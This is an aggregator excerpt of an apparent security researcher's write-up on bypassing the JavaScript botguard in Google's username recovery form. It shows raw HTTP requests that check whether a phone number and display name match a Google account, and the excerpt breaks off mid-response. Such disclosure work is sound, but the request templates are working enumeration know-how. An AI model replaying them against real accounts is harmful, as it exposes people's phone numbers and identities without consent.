Bruteforcing the phone number of any Google user

Source: https://news.ycombinator.com/rss (Hits: 6)
Summary

2025-06-09

A few months ago, I disabled JavaScript in my browser while testing whether any Google services still worked without JS on the modern web. Interestingly enough, the username recovery form still worked!

This surprised me, as I had assumed these account recovery forms had required JavaScript since 2018, when they started relying on botguard solutions generated from heavily obfuscated proof-of-work JavaScript code for anti-abuse.

A deeper look into the endpoints

The username recovery form seemed to allow you to check whether a recovery email or phone number was associated with a specific display name. This required two HTTP requests.

Request:

POST /signin/usernamerecovery HTTP/2
Host: accounts.google.com
Cookie: __Host-GAPS=1:a4zTWE1Z3InZb82rIfoPe5aRzQNnkg:0D49ErWahX1nGW0o
Content-Length: 81
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Email=+18085921029&hl=en&gxf=AFoagUVs61GL09C_ItVbtSsQB4utNqVgKg%3A1747557783359

The cookie and gxf values come from the initial page HTML.

Response:

HTTP/2 302 Found
Content-Type: text/html; charset=UTF-8
Location: https://accounts.google.com/signin/usernamerecovery/name?ess=..<SNIP>..&hl=en

This gave us an ess value tied to that phone number, which we can use for the next HTTP request.

Request:

POST /signin/usernamerecovery/lookup HTTP/2
Host: accounts.google.com
Cookie: __Host-GAPS=1:a4zTWE1Z3InZb82rIfoPe5aRzQNnkg:0D49ErWahX1nGW0o
Origin: https://accounts.google.com
Content-Type: application/x-www-form-urlencoded
Priority: u=0, i

challengeId=0&challengeType=28&ess=<snip>&bgresponse=js_disabled&GivenName=john&FamilyName=smith

This request allows us to check whether a Google account exists with that phone number and the display name "John Smith".

Response (no account found):

HTTP/2 302 Found
Content-Type: text/html; charset=UTF-8
Locati...

First seen: 2025-06-09 14:18

Last seen: 2025-06-09 19:19